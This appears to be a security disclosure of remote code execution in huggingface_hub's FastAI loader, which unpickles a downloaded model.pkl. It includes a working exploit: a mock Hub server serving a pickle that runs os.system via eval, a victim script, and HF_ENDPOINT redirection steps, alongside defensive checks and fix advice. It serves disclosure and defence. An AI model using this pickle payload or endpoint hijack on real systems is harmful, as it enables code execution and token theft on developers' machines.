huggingface_hub v1.11.0 RCE via Insecure Deserialization in FastAI

WARNING

This vulnerability requires the victim to interact with an external URL/API controlled by an attacker. While the most realistic exploitation scenario involves hosting a malicious payload in a public Hugging Face repository, creating such a resource poses a significant risk to the community, as innocent users could inadvertently download and execute the malicious model. To demonstrate the impact with technical fidelity without endangering third parties, this report utilizes a simulated Hugging Face repository hosted on a local mock server.

Below is one (1) way to reproduce RCE in huggingface_hub using a simulated Hugging Face repository controlled by an attacker. No third party needs local access to the victim machine to modify the files that trigger code execution during deserialization.

For this PoC, two (2) different devices were used to simulate the interaction between an attacking machine (Raspberry Pi with IP 192.168.1.90) and a victim machine (Windows with IP 192.168.1.88).

Note: While this vulnerability is specifically verified and reported on version 1.11.0, other prior and subsequent versions may also be susceptible to this insecure deserialization vector.

Introduction

The huggingface_hub library is a core Python client designed to interact with the Hugging Face Hub platform. It allows machine learning developers, engineers, and researchers to programmatically search, download, upload, and manage models, datasets, and spaces directly from their local environments or training pipelines. It serves as a foundational component for the entire open-source artificial intelligence community.

Its critical importance stems from being the main bridge between developer workspaces and millions of public and private ML models. By standardizing weight serialization interfaces and repository interactions across multiple deep learning frameworks, huggingface_hub is implicitly trusted by millions of systems, meaning a security bypass in its loading operations can quickly propagate severe supply chain compromises globally.

Vulnerability description

The huggingface_hub package provides a utility module, fastai_utils.py, designed to simplify the integration between the Hugging Face Hub and the FastAI framework. The function from_pretrained_fastai() is designed to download a model repository snapshot and then load the primary learner object. Because FastAI's native loading mechanism (load_learner) relies on Python's insecure pickle module and from_pretrained_fastai() automatically points to a remote model.pkl file fetched from the network, it creates a direct Remote Code Execution (RCE) pipeline. On Windows systems, this vulnerability is amplified by the library's support for custom endpoints, allowing for Infrastructure-Mediated RCE where an attacker mocks the Hub API to deliver malicious weights.

The vulnerable code in `huggingface_hub/fastai_utils.py`:

Python (fastai_utils.py) Vulnerable FastAI Loader

def from_pretrained_fastai(repo_id: str, revision: str | None = None):
    # ... downloading snapshot ...
    storage_folder = snapshot_download(
        repo_id=repo_id,
        revision=revision,
        library_name="fastai",
        library_version=get_fastai_version(),
    )
    # ...
    from fastai.learner import load_learner  # type: ignore
    return load_learner(os.path.join(storage_folder, "model.pkl")) # <--- CRITICAL SINK
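
Why the load_learner call is a code-execution sink can be illustrated with a harmless sketch that does not involve FastAI at all. The class name Harmless and the choice of sorted as the callable are illustrative assumptions, not part of the library; the point is only that the pickle stream, rather than the loading code, decides which callable runs during deserialization.

```python
import pickle


class Harmless:
    """Illustrative stand-in for an attacker-supplied object (hypothetical name)."""

    def __reduce__(self):
        # pickle stores "call sorted([3, 1, 2])" in the stream instead of object state.
        return (sorted, ([3, 1, 2],))


blob = pickle.dumps(Harmless())

# Unpickling invokes the stored callable; no Harmless instance is rebuilt.
result = pickle.loads(blob)
print(type(result).__name__, result)
```

Replacing sorted with eval or os.system, as the exploit in this report does, turns the same mechanism into arbitrary command execution.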

Technical Impact Analysis

Project Purpose & Context

Hugging Face Hub is the central infrastructure for modern Machine Learning, hosting hundreds of thousands of models. The huggingface_hub client is the primary gateway for developers and AI-as-a-Service (AIaaS) platforms to consume these models. By automating the download-and-load cycle, the library aims to improve developer velocity but inadvertently creates a supply chain risk where "data" (model weights) can execute arbitrary "code" (malicious pickles).

Platform & Deployment Environment

This vulnerability impacts any environment using the FastAI integration, particularly Data Science workstations and Automated ML Training Pipelines. Windows environments are especially susceptible to endpoint redirection attacks where local environment variables (HF_ENDPOINT) or UNC/SMB paths can be used to hijack the model supply chain.

Comprehensive Risk Assessment

The risk is categorized as CRITICAL. An attacker can achieve Remote Code Execution (RCE) by simply manipulating a user into loading a specific repository ID (e.g., attacker/exploit-model) from the Hub or a mocked endpoint. This bypasses the traditional "self-command-injection" boundary because the library is intended to pull and execute content from remote sources. Once a malicious model is cached, it provides a persistent backdoor that re-triggers RCE every time the model is initialized.

Attack Scenario

Who wants to exploit a particular vulnerability?

Adversaries targeting AI supply chains, corporate research environments, or ML engineers. This can include state-sponsored actors seeking industrial secrets or malicious actors looking to hijack expensive GPU infrastructure for crypto-mining or lateral movement.

For what gain?

Gain full administrative access to the victim's environment, steal Hugging Face authentication tokens (often stored in plain text in the cache directory), and achieve persistence within high-compute clusters.

In what way?

By publishing a malicious model to the public Hugging Face Hub under a deceptive name (typosquatting or social engineering) or by exploiting network-level redirections in shared environments to point the HF_ENDPOINT to an attacker-controlled mock API that serves the malicious pickle.

Reproduction steps

On the Raspberry (attacker) - IP 192.168.1.90

kw0@kw0l4b:~ $ hostname -I | awk '{print $1}'
192.168.1.90
kw0@kw0l4b:~ $

Activate the simulated Hugging Face repository and serve the malicious model

Attacker's Exploit code snippet (exploit.py):

exploit.py

import os
import pickle
import json
from http.server import HTTPServer, BaseHTTPRequestHandler

MOCK_SHA = "0123456781abcdef0123456789abcdef01234567"
REPO_ID = "attacker/malicious-model"
FILENAME = "model.pkl"

class RCE:
    def __reduce__(self):
        return (eval, ("__import__('os').system('calc.exe')",))

class HubMockHandler(BaseHTTPRequestHandler):
    def handle_request(self, method):
        # 1. API metadata (pyproject.toml is added to the file list)
        if "/api/models/" in self.path:
            self.send_response(200)
            self.send_header('Content-Type', 'application/json')
            self.end_headers()
            if method == "GET":
                metadata = {
                    "id": REPO_ID,
                    "sha": MOCK_SHA,
                    "siblings": [{"rfilename": FILENAME}, {"rfilename": "pyproject.toml"}],
                    "private": False,
                }
                self.wfile.write(json.dumps(metadata).encode())

        # 2. Pickle payload download
        elif FILENAME in self.path:
            payload = pickle.dumps(RCE())
            self._send_file(payload, method)

        # 3. Fake pyproject.toml download (to avoid validation errors)
        elif "pyproject.toml" in self.path:
            content = b'[build-system]\nrequires = ["fastai>=2.4", "fastcore>=1.3.27"]'
            self._send_file(content, method)
        else:
            self.send_error(404)

    def _send_file(self, content, method):
        self.send_response(200)
        self.send_header('Content-Type', 'application/octet-stream')
        self.send_header('Content-Length', str(len(content)))
        self.send_header('ETag', f'"{MOCK_SHA}"')
        self.send_header('X-Repo-Commit', MOCK_SHA)
        self.end_headers()
        if method == "GET":
            self.wfile.write(content)
            print(f"[!] File sent: {self.path}")

    def do_GET(self): self.handle_request("GET")
    def do_HEAD(self): self.handle_request("HEAD")

if __name__ == "__main__":
    print("[*] Attack server started (port 8000)...")
    HTTPServer(('0.0.0.0', 8000), HubMockHandler).serve_forever()

python exploit.py

On Windows (victim) - IP 192.168.1.88

(.venv) PS L:\Deserializer\PYPI-huggingface_hub> Get-NetIPAddress -AddressFamily IPv4 | Where-Object PrefixOrigin -eq "Dhcp" | Select-Object -ExpandProperty IPAddress
192.168.1.88
(.venv) PS L:\Deserializer\PYPI-huggingface_hub>

1. Create a .venv, activate it, and install the latest version (1.11.0) of huggingface_hub using pip install huggingface-hub.
2. Install fastai, toml, and ipython to complete the testing environment: pip install fastai toml ipython.
3. Set the environment variable $env:HF_ENDPOINT="http://192.168.1.90:8000" to point to the simulated Hugging Face repository.
4. Launch poc.py to trigger the RCE from the victim machine:

Victim's client execution script (poc.py):

poc.py

import os
from huggingface_hub import from_pretrained_fastai

# Target the malicious repository identity
MALICIOUS_REPO = "attacker/malicious-model"

print(f"[*] Attempting to load model from: {MALICIOUS_REPO}")
try:
    # Trigger the insecure download and unpickling
    learner = from_pretrained_fastai(MALICIOUS_REPO)
except Exception as e:
    print(f"[*] Finished. Error info (if any): {e}")

python poc.py

Executive Summary: RCE via Insecure Deserialization in `huggingface_hub` (FastAI Integration)

The research identifies a critical Remote Code Execution (RCE) vulnerability in huggingface_hub v1.11.0, specifically within the fastai_utils.py module.

Root Cause: The from_pretrained_fastai() function automatically downloads and passes a model.pkl file to FastAI’s load_learner function. Because load_learner utilizes Python’s pickle module, it is inherently vulnerable to arbitrary code execution when processing untrusted input.
Exploitation Mechanism: The library allows for the manipulation of the Hub endpoint via the HF_ENDPOINT environment variable. An attacker can redirect the victim's request to an attacker-controlled mock API, which then serves a malicious model.pkl file. Upon local processing, the pickle deserialization executes the payload in the victim's environment.

Analysis of Scope and Security Implications

This vulnerability is of critical severity as it weaponizes a fundamental utility designed for model sharing and deployment.

1. Infection Scenarios

Supply Chain/Hub Poisoning: Attackers can publish malicious models on the public Hugging Face Hub using typosquatting or social engineering. Any developer using from_pretrained_fastai() to load these models will be immediately compromised.
Endpoint Redirection: In corporate environments, an attacker can influence the HF_ENDPOINT configuration or conduct DNS/network-level man-in-the-middle attacks to force the client to fetch models from a malicious server.
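
A caller-side guard against the endpoint redirection scenario could look like the following minimal sketch. The function names and the single-host allowlist are assumptions made for illustration, not part of huggingface_hub. The check only rejects a tampered HF_ENDPOINT value; it does nothing against a malicious repository hosted on the legitimate Hub, and protection against DNS-level interception still depends on normal TLS certificate validation.

```python
import os
from urllib.parse import urlparse

# Assumption: only the public Hub is trusted; adjust for a private mirror.
TRUSTED_HOSTS = frozenset({"huggingface.co"})


def endpoint_is_trusted(endpoint: str, trusted_hosts=TRUSTED_HOSTS) -> bool:
    """Return True only for HTTPS endpoints whose host is on the allowlist."""
    parsed = urlparse(endpoint)
    return parsed.scheme == "https" and parsed.hostname in trusted_hosts


def check_configured_endpoint() -> str:
    """Hypothetical guard to call before any download-and-load helper."""
    endpoint = os.environ.get("HF_ENDPOINT", "https://huggingface.co")
    if not endpoint_is_trusted(endpoint):
        raise RuntimeError(f"Refusing to use untrusted Hub endpoint: {endpoint}")
    return endpoint
```

With the PoC configuration from this report (HF_ENDPOINT set to http://192.168.1.90:8000), check_configured_endpoint() would raise before any network request is made.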

2. Factors Exacerbating Risk

Automated Trust: Because the library is designed to automate the "download-and-load" cycle, the deserialization is an expected and implicit part of the operation, leading developers to bypass standard security scrutiny of the loaded files.
Persistent Backdoor: Once a malicious model is cached on the victim's machine, the RCE re-triggers every time the cached model is loaded, ensuring persistence within high-compute environments.
Credential Exfiltration: Successful execution allows attackers to steal Hugging Face authentication tokens (often stored in the cache directory), enabling further unauthorized actions on the user's behalf.
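
The kind of scrutiny that the automated cycle skips can be sketched with the standard pickletools module, which walks a pickle stream without executing it. The helper name call_opcodes_in and the Probe class are hypothetical, and the opcode set is a heuristic assumption. A genuine FastAI learner file would be expected to contain these opcodes as well, because it stores class instances, so their presence shows only that the file is able to invoke callables, not that it is malicious.

```python
import pickle
import pickletools

# Opcodes that import names or call/instantiate objects during unpickling.
CALL_OPCODES = frozenset(
    {"GLOBAL", "STACK_GLOBAL", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX", "REDUCE"}
)


def call_opcodes_in(data: bytes) -> set[str]:
    """Return the import/call opcodes present in a pickle stream, without loading it."""
    return {opcode.name for opcode, _arg, _pos in pickletools.genops(data)} & CALL_OPCODES


class Probe:
    """Hypothetical object whose pickle asks the loader to call sorted()."""

    def __reduce__(self):
        return (sorted, ([2, 1],))


# Plain containers and numbers need no callables; the Probe stream does.
plain = call_opcodes_in(pickle.dumps({"weights": [0.1, 0.2]}))
active = call_opcodes_in(pickle.dumps(Probe()))
print(plain, active)
```

Because a legitimate learner and a malicious one look alike at this level, inspection of this kind supports the argument that the format itself, rather than any individual file, is the problem.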

Conclusion and Recommendation

This is a critical-severity vulnerability. The automated deserialization of model weights from remote sources without validation represents a catastrophic risk to MLOps pipelines.

Suggested actions for the development team:

Remove Pickle Dependency: Deprecate the use of pickle for loading model learners. Transition to secure, non-executable serialization formats for model artifacts.
Integrity Verification: Implement mandatory signature verification or checksum validation for all files downloaded from the Hub before they are passed to any loading utility.
Restrict Endpoint Configuration: Disable the ability to arbitrarily modify HF_ENDPOINT via environment variables in production, or implement strict certificate pinning for API interactions.
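
The integrity verification suggestion can be sketched as a digest check that runs before a file reaches any loader. The function names below are hypothetical, and the sketch assumes the pinned SHA-256 value was obtained through a trusted, out-of-band channel; a digest served by the same endpoint as the file offers no protection against the mock-server scenario in this report.

```python
import hashlib
import hmac
import tempfile
from pathlib import Path


def sha256_of(path: Path, chunk_size: int = 1 << 20) -> str:
    """Hash a file in chunks so large model files are not read into memory at once."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_artifact(path: Path, pinned_sha256: str) -> Path:
    """Return the path only if its digest matches the pinned value (assumed trusted)."""
    actual = sha256_of(path)
    if not hmac.compare_digest(actual, pinned_sha256.lower()):
        raise ValueError(f"Digest mismatch for {path}: got {actual}")
    return path


# Usage with a throwaway file standing in for a downloaded model.pkl.
with tempfile.TemporaryDirectory() as tmp:
    artifact = Path(tmp) / "model.pkl"
    artifact.write_bytes(b"example bytes")
    pinned = hashlib.sha256(b"example bytes").hexdigest()
    accepted = verify_artifact(artifact, pinned) == artifact
    try:
        verify_artifact(artifact, "0" * 64)
        rejected = False
    except ValueError:
        rejected = True
```

A check like this narrows the risk to files the user has explicitly pinned; it does not make pickle safe, so it complements rather than replaces a move to a non-executable format.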